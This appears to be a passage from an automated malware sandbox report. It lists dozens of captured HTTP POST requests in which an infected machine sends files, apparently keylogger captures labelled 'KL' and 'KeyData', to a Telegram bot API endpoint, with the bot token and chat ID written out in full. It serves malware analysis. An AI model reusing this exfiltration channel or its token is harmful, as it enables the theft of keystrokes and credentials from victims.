            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-%20KeyDatalyDLsABf.txt:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 535Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 601Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /bot7508829218:AAEwYuoUi01mE6iR0gIhF2Llmbtou-hlYgo/sendDocument?chat_id=1342702073&caption=DC-KL:::user-PC\user\8.46.123.189 HTTP/1.1Accept: */*Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: api.telegram.orgContent-Length: 568Connection: Keep-AliveCache-Control: no-cache
